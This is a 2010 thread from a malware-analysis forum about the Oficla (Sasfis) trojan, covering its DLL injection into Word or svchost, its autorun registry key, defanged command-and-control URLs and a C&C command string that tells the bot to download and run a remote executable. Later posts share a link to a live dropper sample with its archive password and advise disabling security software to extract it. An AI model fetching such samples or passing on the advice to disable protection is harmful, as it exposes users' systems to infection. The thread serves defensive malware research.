Trojan Oficla (alias Sasfis)

Forum for analysis and discussion about malware.

Trojan Oficla (alias Sasfis)

Postby EP_X0FF » Fri Mar 26, 2010 6:15 am

Trojan that using Microsoft Office component - Word to survive and download additional stuff.
If Microsoft Office not installed / Word not present, trojan starting additional svchost process and uses it for it's purposes (in both cases trojan maps malicious dll inside address space of victim processes).

Bot (file.ex_ in attach) is trying to contact _hxxp://netmegasite.net/source/bb.php (C&C link obfuscated) to get additional instructions.

Norton Safe Web report

It is getting additional commands looking like this:

[info]runurl:_hxxp://www.gynweb.de/forum/customavatars/2_u.exe|taskid:117|delay:45|upd:0|backurls:[/info]
(link obfuscated)

VirusTotal report for 2_u.exe

Set itself to autorun through HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell registry key.

Original dropper VirusTotal result
Extracted malicious code to be injected inside svchost/winword VirusTotal result

All samples, including payload, attached.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Re: Trojan Oficla (alias Sasfis, Sisron)

Postby cjbi » Thu Apr 01, 2010 4:00 pm

You do not have the required permissions to view the files attached to this post.
cjbi
 
Posts: 92
Joined: Sun Mar 14, 2010 7:16 am
Reputation point: 84

Re: Trojan Oficla

Postby gjf » Fri Jun 18, 2010 1:17 pm

Another dropper. Not detecetd in present time. Password is virus
hxxp://www.megaupload.com/?d=JZNRGNVZ
VirusInfo / Defendium / SafeZone Helpers Crew
User avatar
gjf
 
Posts: 198
Joined: Mon Mar 15, 2010 10:23 am
Location: Where I lay my head is home
Reputation point: 26

Re: Trojan Oficla

Postby tomatto007 » Sat Jun 19, 2010 11:34 am

gjf wrote:Another dropper. Not detecetd in present time. Password is virus
hxxp://www.megaupload.com/?d=JZNRGNVZ

I downloaded the file but I can not unzip it - please, write your password once again? ;)
tomatto007
 
Posts: 21
Joined: Fri Mar 19, 2010 8:16 pm
Reputation point: 2

Re: Trojan Oficla

Postby Alex » Sat Jun 19, 2010 7:24 pm

The password which gjf has been posted above - virus - is correct. If you have any security software installed try to disable it while extracting the archive.
I am Jack's NULL pointer (actual e-mail contact.ntinternals_at_gmail.com)
User avatar
Alex
 
Posts: 268
Joined: Sun Mar 07, 2010 11:34 am
Reputation point: 89

Re: Trojan Oficla

Postby tomatto007 » Sat Jun 19, 2010 8:35 pm

Oooops :roll:
tomatto007
 
Posts: 21
Joined: Fri Mar 19, 2010 8:16 pm
Reputation point: 2

Re: Trojan Oficla

Postby happyhappy » Mon Jun 21, 2010 9:23 am

tomatto007 wrote:Oooops :roll:


Pass: virus
happyhappy
 
Posts: 1
Joined: Thu Mar 25, 2010 4:18 am
Reputation point: 0

Re: Trojan Oficla

Postby tomatto007 » Mon Jun 21, 2010 5:28 pm

Thanks ;)
tomatto007
 
Posts: 21
Joined: Fri Mar 19, 2010 8:16 pm
Reputation point: 2

Re: Trojan Oficla (alias Sasfis)

Postby EP_X0FF » Sat Jul 03, 2010 5:44 am

You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Oficla

Postby Evilcry » Fri Sep 24, 2010 8:55 am

Hi,

The following sample come out from a malicious domain tha has the particularity of caching victim's IP
second access lead to 404; here the Oficla trojan I''ve extracted from.

Regards
You do not have the required permissions to view the files attached to this post.
Evilcry
 
Posts: 135
Joined: Tue Apr 20, 2010 6:10 pm
Reputation point: 90

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 5 guests